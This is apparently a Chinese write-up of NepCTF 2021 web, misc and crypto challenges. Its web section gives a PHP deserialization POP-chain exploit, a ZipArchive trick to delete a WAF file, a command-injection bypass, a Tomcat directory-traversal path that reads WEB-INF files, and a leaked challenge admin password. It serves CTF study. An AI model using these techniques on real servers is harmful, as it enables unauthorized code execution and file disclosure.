概述
web
little_trick
非常简单的命令执行绕过
substr(0,-1)从最后开始过,
echo`nl%20*`;
梦里花开牡丹亭
<?php
highlight_file(__FILE__);
error_reporting(0);
include('shell.php');
class Game{
public $username;
public $password;
public $choice;
public $register;
public $file;
public $filename;
public $content;
public function __construct()
{
$this->username='user';
$this->password='user';
}
public function __wakeup(){
if(md5($this->register)==="21232f297a57a5a743894a0e4a801fc3"){
$this->choice=new login($this->file,$this->filename,$this->content);
}else{
$this->choice = new register();
}
}
public function __destruct() {
$this->choice->checking($this->username,$this->password);
}
}
class login{
public $file;
public $filename;
public $content;
public function __construct($file,$filename,$content)
{
$this->file=$file;
$this->filename=$filename;
$this->content=$content;
}
public function checking($username,$password)
{
if($username==='admin'&&$password==='admin'){
$this->file->open($this->filename,$this->content);
die('login success you can to open shell file!');
}
}
}
class register{
public function checking($username,$password)
{
if($username==='admin'&&$password==='admin'){
die('success register admin');
}else{
die('please register admin ');
}
}
}
class Open{
function open($filename, $content){
if(!file_get_contents('waf.txt')){
shell($content);
}else{
echo file_get_contents($filename.".php");
}
}
}
if($_GET['a']!==$_GET['b']&&(md5($_GET['a']) === md5($_GET['b'])) && (sha1($_GET['a'])=== sha1($_GET['b']))){
@unserialize(base64_decode($_POST['unser']));
}
这个代码的链不难找
Game::wakeup->login::checking->Open::open
先看看shell.php里是些什么东西
exp1
<?php
class Game{
public $username;
public $password;
public $choice;
public $register;
public $file;
public $filename;
public $content;
public function __construct()
{
$this->username='admin';
$this->password='admin';
$this->register='admin';
$this->file=new Open();
$this->filename="php://filter/read=convert.base64-encode/resource=shell";
$this->content="ls";
}
}
class login{
public $file;
public $filename;
public $content;
}
class Open{
}
$b = new Login();
$c = new Game();
echo base64_encode(serialize($c));
?>
发现里面有个命令执行绕过
而想要调用shell函数就必须要让waf.txt不存在
搜索发现可以用原生类的同名函数open来进行删除
原生类讲解
ZipArchive::open
这个类可以将文件覆盖删除
exp2
<?php
class Game{
public $username;
public $password;
public $choice;
public $register;
public $file;
public $filename;
public $content;
public function __construct()
{
$this->username='admin';
$this->password='admin';
$this->register='admin';
$this->file=new ZipArchive();
$this->filename="waf.txt";
$this->content=ZIPARCHIVE::OVERWRITE;
}
}
class login{
public $file;
public $filename;
public $content;
}
class Open{
}
$b = new Login();
$c = new Game();
echo base64_encode(serialize($c));
?>
此时waf.txt已经删除
再命令执行绕过即可
nl /flag
fake_revenge
下载下来发现是ThinkPHP框架,直接用payload打
发现禁了一些函数
发现能用passthru
cat flag即可
easy_tomcat
进去发现要登录
测试一波弱密码,sql注入,无果,扫下目录
注册登录
发现head_path参数,也许存在任意文件读取
用绝对路径配合绕过
static/img/../../WEB-INF/web.xml
而网页注释写了尝试admin
读取LoginServelet.class,base64解码是这些玩意,看看InitServlet这个初始化
看到admin密码
admin/no_one_knows_my_password_75767388428345
进去发现有之前登陆的账号,并且可以删除
发现他传的是json的东西,而之前读取AdminServlet文件内容时,里面刚好有fastjson的东西
vn前不久刚出
https://blog.csdn.net/SopRomeo/article/details/114945759?spm=1001.2014.3001.5501
绕过都没有
misc
签到
将数据循环二进制输出即可
# -*- coding: utf-8 -*-
# @File : test
# @Author : penson <penson@penson.top>
# @Email: decentpenson@gmail.com
# @Date : 2021/3/20 10:58
flag =[0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xfffffffffffffffffffbffffffffffff,0xfffffffffffffffffffbffffffffffff,0xfffffffffffffffffffbffffffffffff,0xfffffffffffffffffff9ffffffffffff,0xfffffffffffffffffff5f0001fffffff,0xfffffffffffffffe000407ffcfffffff,0xfffffffffffffff8fffffffff7ffffff,0xfffffffffffffff3fffffffff3ffffff,0xffffffffffffffcffffffffffbffffff,0xffffffffffffffdffffffffffbffffff,0xffffffffffffffdffffffffffbffffff,0xfffffffffffffffffffffffffdffffff,0xfffffffffffffffffffffffffdffffff,0xfffffffffffffffffffffffffdffffff,0xfffffffffffffffffffffffffcffffff,0xfffffffffffffffffffffffffcffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffff0000ffffffffffff,0xfffffffffffffffe7fff1f9fffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffe1fffffffffffdffffffffffff,0xffffff8cfffffffffffdffffffffffff,0xfff03fbf7ffffffffffbffffffffffff,0xffe79f3f3ffffffffffbffffffffffff,0xffefde7fbffffffffffbffffffffffff,0xffefeeff9ffffffffffbffffffffffff,0xffefe6ffdffffffffff9ffffffffffff,0xffcff6ffdffffffffffcffffffffffff,0xffdffaffcffffffffffe3fffffffffff,0xffdff8ffefffffffffff800fffffffff,0xffdff9ffefffffffffff0fffffffffff,0xffdffdffeffffffffffc7fffffffffff,0xffdffffff7fffffffff3ffffffffffff,0xffdffffff7fffffffff7ffffffffffff,0xffdffffff7ffffffffffffffffffffff,0xffdfff9fffffffffffffff7fffffffff,0xffffffbfffffffffffffff3fffffffff,0xffffff7ffffffffffffc1fbfffffffff,0xffffff7ffffffffffff9df9fffffffff,0xffffff7ffffffffffffbdfdfffffffff,0xffffff7ffffffffffffbdfdfffffffff,0xffffff9ffffffffffffbdf9fffffffff,0xffffffcffffffffffffbdfbfffffffff,0xffffffe3fffffffffffbdfbfffffffff,0xffffffc007fffffffffbdf3fffffffff,0xffffff1f83fffffffff9df7fffffffff,0xfffffe7ffffffffffffcdcffffffffff,0xfffffefffffffffffffe01ffffffffff,0xffffffffffffffffffffdfffffffffff,0xffffffffffffffffffffdfffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xfffffffff3ffffffffffffffffffffff,0xfffffff3e7ffffffffffffffffffffff,0xffffffc78ffffffffff8ffffffffffff,0xffffffb03fffffffffff3fffffffffff,0xffffff23ffffffffffff87ffffffffff,0xffffff787ffffffffffff0ffffffffff,0xffffff7f9ffffffffffffc7fffffffff,0xffffff7fc7fffffffffff1ffffffffff,0xffffff7ff3ffffffffffc7ffffffffff,0xffffffbffbffffffffff1fffffffffff,0xffffffcffbfffffffffcffffffffffff,0xffffffe7e7ffffffffe1ffffffffffff,0xfffffff80fffffffffefffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffe3ffffffffff,0xfffffffffffffffff01f89ffffffffff,0xffffffffffffffffc7cf3cffffffffff,0xffffffffffffffff9fee7effffffffff,0xfffffffffbffffff3ff6feffffffffff,0xfffffffffbffffff7ff2fe7fffffffff,0xfffffffffbffffff7ffaff7fffffffff,0xfffffffffbfffffefff8ff7fffffffff,0xfffffffffbfffffefffcff7fffffffff,0xfffffffffbfffffefffcff3fffffffff,0xfffffffffbfffffefffcffbfffffffff,0xfffffffffbfffffeffffffbfffffffff,0xfffffffffbffffffffffffbfffffffff,0xfffffffffbffffffffffffbfffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbfffffc00ffffffffffffff,0xfffffffffbfffffbff00001fffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffffffffffffdfcffffffffff,0xfffffffffffffffffffbfeffffffffff,0xfffffffffffffffffff3fe7fffffffff,0xfffffffffffffffffff7ff7fffffffff,0xfffffffffffffffffff7ff7fffffffff,0xfffffffffffffffffff7ff7fffffffff,0xfffffffe1ffffffffff7ff7fffffffff,0xfffffff0fffffffffff7ff7fffffffff,0xffffff8ffffffffffff7feffffffffff,0xfffffff3fffffffffff9f0ffffffffff,0xfffffffcfffffffffffe07ffffffffff,0xfffffffe7fffffffffffffffffffffff,0xffffffff7fffffffffffffffffffffff,0xffffffffbfffffffffffffffffffffff,0xffffffffbfffffffffffffffffffffff,0xffffffff7fffffffffffffffffffffff,0xfffffffe7fffffffffffffffffffffff,0xffffffc0ffffffffffffffffffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xff8001fffffffffffffffff7ffffffff,0xffbffc00fffffffffffffff7ffffffff,0xff7ffffe1ffffffffffffff7ffffffff,0xff7fffffcffffffffffffff7ffffffff,0xff7fffffe7fffffffffffff7ffffffff,0xff3ffffff3fffffffffffff7ffffffff,0xffbffffffbfffffffffffff7ffffffff,0xff7ffffff3fffffffffffff7ffffffff,0xff83ffffe7fffffffffffff7ffffffff,0xfff83fffcffffffffffffff7ffffffff,0xffff80003ffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xffbffffffffffffffffffff7ffffffff,0xff9ffffffffffffffffffff7ffffffff,0xffdffffffffffffffffffff7ffffffff,0xffeffffffffffffffffffff7ffffffff,0xffeffffffffffffffffffff7ffffffff,0xfff7fffffffffffffffffff7ffffffff,0xfff7fffffffffffffffffff7ffffffff,0xfffbfffffffffffffffffff7ffffffff,0xfff9fffffffffffffffffff7ffffffff,0xfffdfffffffffffffffffff7ffffffff,0xfffcfffffffffffffffffff7ffffffff,0xfffefffffffffffffffffff7ffffffff,0xfffe7ffffffffffffffffff7ffffffff,0xffff3ffffffffffffffffff7ffffffff,0xffffbfffffffffffffffffffffffffff,0xffffbfffffffffffffffffffffffffff,0xffff9f003fffffffffffffffffffffff,0xffffc07f83ffffffffffffffffffffff,0xffff9fffffffffff8000001fffffffff,0xffff3fffffffffff3fffffcfffffffff,0xfffe7ffffffffffe7fffffe7ffffffff,0xfffcfffffffffffcfffffff3ffffffff,0xfff9fffffffffffc1ffffff3ffffffff,0xfff3fffffffffffe7fffffc7ffffffff,0xffe7ffffffffffff03ffe01fffffffff,0xffdffffffffffffff8000fffffffffff,0xff3fffffffffffffffffffffffffffff,0xfe7fffffffffffffffffffffffffffff,0xf8ffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xfffffffffffffffeffffffffffffffff,0xfffffffffffffffeffffffffffffffff,0xfffffffffffffffeffffffffffffffff,0xfffffffffffffffeffffffffffffffff,0xfffffffffffffffefffe03ffffffffff,0xffffffffffffffff7ffcf8ffffffffff,0xfbffffffffffffff7ff9feffffffffff,0xf3ffffffffffffff7ff3ff7fffffffff,0xe7ffffffffffffffbff7ffbfffffffff,0xefffffffffffffffbff7ffbfffffffff,0xefffffffffffffffbff7ffdfffffffff,0xeffffffffcffffffbff7ffdfffffffff,0xeffffffffeffffffbff7ffdfffffffff,0xe7fffc0ffeffffffbff7ffcfffffffff,0xf3fff9e07effffffbff7ffefffffffff,0xf80017ff80ffffffbff7ffefffffffff,0xffffd7ffffffffff0037ffefffffffff,0xffffc7ffffffffffffc3ffefffffffff,0xffffefffffffffffffffffefffffffff,0xffffefffffffffffffffffcfffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffe03fffffffffffffffffffffffff,0xffffcf9fffffffffffffffffffffffff,0xffff9fdffffffffffffffff7ffffffff,0xffffbfdffffffffffffffff7ffffffff,0xffffbfcffffffffffffffff7ffffffff,0xffff3feffffffffffffffff7ffffffff,0xffff7feffffffffffffffff7ffffffff,0xffff7feffffffffffffffff7ffffffff,0xffff000000007ffffffffff7ffffffff,0xffffbffffffe7ffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xffffffdffffffffffffffff7ffffffff,0xffffffcffffffffffffffff7ffffffff,0xffff07effffffffffffffff7ffffffff,0xffff73effffffffffffffff7ffffffff,0xffff7beffffffffffffffff7ffffffff,0xffff7beffffffffffffffff7ffffffff,0xffff7beffffffffffffffff7ffffffff,0xffff9bcffffffffffffffff7ffffffff,0xffffc3dffffffffffffffff7ffffffff,0xfffff01ffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfcfffffffffffffffffffff7ffffffff,0xfe1ffffffffffffffffffff7ffffffff,0xffe0fffffffffffffffffff7ffffffff,0xfffe07fffffffffffffffff7ffffffff,0xfffff00ffffffffffffffff7ffffffff,0xffffffeffffffffffffffff7ffffffff,0xffffff8ffffffffffffffff7ffffffff,0xfffffe3ffffffffffffffff7ffffffff,0xfffff8ffffffffffffffffffffffffff,0xffffe3ffffffffffffffffffffffffff,0xfffe1fffffffffffffffffffffffffff,0xffc0ffffffffffffffffffffffffffff,0xfc1fffffffffffffffffffffffffffff,0xfc7fffffffffffffffffffffffffffff,0xff807fffffffffffffffffffffffffff,0xffff01ffffffffffffffffffffffffff,0xfffffc07ffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff]
test=""
for i in flag:
print("{:b}".format(i))
看图识字
出题人日记
改为zip后发现字符
凯撒密码
搜索js图片隐写
js隐写
js隐写工具下载
解密这个图即可
crypto
Real_Base
身为一个web????,第一次做出了这种密码题还是挺开心的。虽然这题不难,题目给出了base64变种加密的源码,其实只要分析base64编码的原理,再去看他的代码,就很容易写出他的解密脚本
我已经在源代码里写了分析
# -*- coding: utf-8 -*-
# @File : RealBase
# @Author : penson <penson@penson.top>
# @Email: decentpenson@gmail.com
# @Date : 2021/3/21 19:34
# py2
import string
import random
# from secret import flag, b_char
print '123456'.zfill(10)
def encode(s):
res = ''
binstr = [bin(ord(s[i])).replace('0b', '').zfill(8) for i in range(len(s))]
p1 = len(binstr) // 3
p2 = len(binstr) % 3
print binstr
for i in range(p1):
str_p1 = binstr[i * 3] + binstr[i * 3 + 1] + binstr[i * 3 + 2]
tmp_str = [str_p1[x: x + 6] for x in [0, 6, 12, 18]]#以6位bit为一组,总共四组
tmp_res = [b_char[int(x, 2)] for x in tmp_str] #将二进制转为十进制,十进制即为b_char字符的坐标
res += ''.join(tmp_res)
if p2:
part2 = binstr[3 * p1:] #取不满足3的倍数后面的几位数
str_p2 = ''.join(part2) + (3 - p2) * '0' * 8 #补足0
tmp_str = [str_p2[x: x + 6] for x in [0, 6, 12, 18]][:p2 + 1] #6位二进制为一组,
tmp_res = [b_char[int(x, 2)] for x in tmp_str] #将二进制转十进制,十进制即为b_char字符的坐标
res += ''.join(tmp_res)
res += '=' * (3 - p2)
# print "p2",res
return res
def decode(m):
m = m.replace('=','')
binstr=[]
text=''
for i in m:
for j in range(len(b_char)):
if i ==b_char[j]:
text+=bin(j).replace('0b','').zfill(6)
j=0
for i in range(8,402,8):
binstr.append(text[8*j:i])
j+=1
flag=""
for i in binstr:
l = 0
for j in range(1,8):
if i[l:j]== '1':
flag+=chr(int(i[l:],2))
break
else:
l+=1
continue
print flag
b_char = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ+/"
m1='rTcb1BR8YVW2EOUjweXpIiLt5QCNg7ZAsD9muq3ylMhvofnx/P'
# print len(m1)
m = encode(m1)
decode("tCvM4R3TzvZ7nhjBxSiNyxmP28e7qCjVxQn91SRM3gBKzxQ=")
# print encode(flag)
# print len("rTcb1BR8YVW2EOUjweXpIiLt5QCNg7ZAsD9muq3ylMhvofnx/P")
# print len("2Br9y9fcu97zvB2OruZv0D3Bwhbj0uNQnvfdtC2TwAfPrdBJ3xeP4wNn0hzLzCVUlRa=")
# tCvM4R3TzvZ7nhjBxSiNyxmP28e7qCjVxQn91SRM3gBKzxQ=
最后
以上就是拼搏导师为你收集整理的nepctf2021webmisccrypto的全部内容,希望文章能够帮你解决nepctf2021webmisccrypto所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复